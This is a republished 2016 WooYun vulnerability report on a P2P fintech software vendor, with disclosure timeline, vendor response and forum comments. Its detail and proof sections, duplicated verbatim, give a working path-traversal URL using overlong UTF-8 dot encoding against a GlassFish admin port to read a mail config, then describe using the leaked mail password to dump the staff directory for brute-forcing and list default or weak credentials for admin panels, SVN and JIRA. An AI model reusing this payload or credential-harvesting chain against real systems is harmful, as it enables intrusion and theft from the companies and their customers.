P2P金融安全之擒贼先擒王

admin
admin
admin
139803
文章
114
评论
2017年4月21日15:32:54评论338 views字数 223阅读0分44秒阅读模式
摘要

2016-04-07: 细节已通知厂商并且等待厂商处理中
2016-04-11: 厂商已经确认,细节仅向厂商公开
2016-04-21: 细节向核心白帽子及相关领域专家公开
2016-05-01: 细节向普通白帽子公开
2016-05-11: 细节向实习白帽子公开
2016-05-26: 细节向公众公开

漏洞概要 关注数(32) 关注此漏洞

缺陷编号: WooYun-2016-193578

漏洞标题: P2P金融安全之擒贼先擒王

相关厂商: 云信

漏洞作者: _Thorns

提交时间: 2016-04-07 22:50

公开时间: 2016-05-26 10:20

漏洞类型: 任意文件遍历/下载

危害等级: 高

自评Rank: 20

漏洞状态: 已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源:www.wooyun.org ,如有疑问或需要帮助请联系

Tags标签: 无

0人收藏

漏洞详情

披露状态:

2016-04-07: 细节已通知厂商并且等待厂商处理中
2016-04-11: 厂商已经确认,细节仅向厂商公开
2016-04-21: 细节向核心白帽子及相关领域专家公开
2016-05-01: 细节向普通白帽子公开
2016-05-11: 细节向实习白帽子公开
2016-05-26: 细节向公众公开

简要描述:

P2P金融安全之擒贼先擒王,云信是一家提供互联网金融核心技术的企业,用户包含了http://www.creditcloud.com/work/

详细说明:

任意文件读取获取到了邮件信息;:

**.**.**.**:4848/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/var/CreditCloud/config/EmailConfig.xml

code 区域 
<host>**.**.**.**</host>
 <port>465</port>
 <user>donotreply@**.**.**.**</user>
 <password>Passw0rd</password>

登录邮件

P2P金融安全之擒贼先擒王

把企业通讯录脱下来,拿来爆破下。

P2P金融安全之擒贼先擒王

获取几个默认密码,其他密码没尝试了。

P2P金融安全之擒贼先擒王

躺枪...

**.**.**.**

**.**.**.**:8080/admin

admin password

P2P金融安全之擒贼先擒王

http://**.**.**.**:8080/admin/login

admin password

http://**.**.**.**:8080/pro/login

admin password

太多这种正在开发的系统了。

SVN:

svn地址:svn://**.**.**.**/

账户:product

密码:CreditC**.**.**.**

P2P金融安全之擒贼先擒王

http://**.**.**.**/p2padmin/

1967165118@**.**.**.**

021488

P2P金融安全之擒贼先擒王

惊呆了,!!!我这辈子都赚不了这么多阿。

新浪微博 min.chen@**.**.**.** zealot

http://jira.**.**.**.**/

jinhui.cheng

123456

不深入了... 还有很多系统

漏洞证明:

任意文件读取获取到了邮件信息;:

**.**.**.**:4848/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/var/CreditCloud/config/EmailConfig.xml

code 区域 
<host>**.**.**.**</host>
 <port>465</port>
 <user>donotreply@**.**.**.**</user>
 <password>Passw0rd</password>

登录邮件

P2P金融安全之擒贼先擒王

把企业通讯录脱下来,拿来爆破下。

P2P金融安全之擒贼先擒王

获取几个默认密码,其他密码没尝试了。

P2P金融安全之擒贼先擒王

躺枪...

**.**.**.**

**.**.**.**:8080/admin

admin password

P2P金融安全之擒贼先擒王

http://**.**.**.**:8080/admin/login

admin password

http://**.**.**.**:8080/pro/login

admin password

太多这种正在开发的系统了。

SVN:

svn地址:svn://**.**.**.**/

账户:product

密码:CreditC**.**.**.**

P2P金融安全之擒贼先擒王

http://**.**.**.**/p2padmin/

1967165118@**.**.**.**

021488

P2P金融安全之擒贼先擒王

惊呆了,!!!我这辈子都赚不了这么多阿。

新浪微博 min.chen@**.**.**.** zealot

http://jira.**.**.**.**/

jinhui.cheng

123456

不深入了... 还有很多系统

修复方案:

版权声明:转载请注明来源 _Thorns@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:9

确认时间:2016-04-11 10:12

厂商回复:

CNVD未直接复现所述情况,已由CNVD通过以往建立的处置渠道向网站管理方通报,由其后续提供解决方案。

最新状态:

2016-04-11:更新处置状态:CNVD未直接复现所述情况,已由CNVD通过网站管理方公开联系渠道向其邮件通报,由其后续提供解决方案。

漏洞评价:

对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):

登陆后才能进行评分

评价

  1. 2016-04-07 22:57 | Mark0smith ( 普通白帽子 | Rank:176 漏洞数:71 )

    1

    Mark

  2. 2016-04-07 23:16 | 从容 ( 普通白帽子 | Rank:415 漏洞数:99 | 哇啦啦啦啦啦 我的宝贝 | ..)

    1

    禽我?

  3. 2016-04-07 23:21 | _Thorns ( 普通白帽子 | Rank:1754 漏洞数:269 | 以大多数人的努力程度之低,根本轮不到去拼...)

    1

    @从容 大表哥你别闹...

  4. 2016-04-08 00:23 | 带头大哥 ( 普通白帽子 | Rank:879 漏洞数:258 | |任意邮件伪造| |目录遍历| |任意文件读取|...)

    1

    贼 。 。 。 啪啪啪

  5. 2016-04-08 09:23 | 木易 ( 普通白帽子 | Rank:347 漏洞数:70 | 不,,不要误会,我不是针对谁,我是说在座...)

    1

    ·····

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin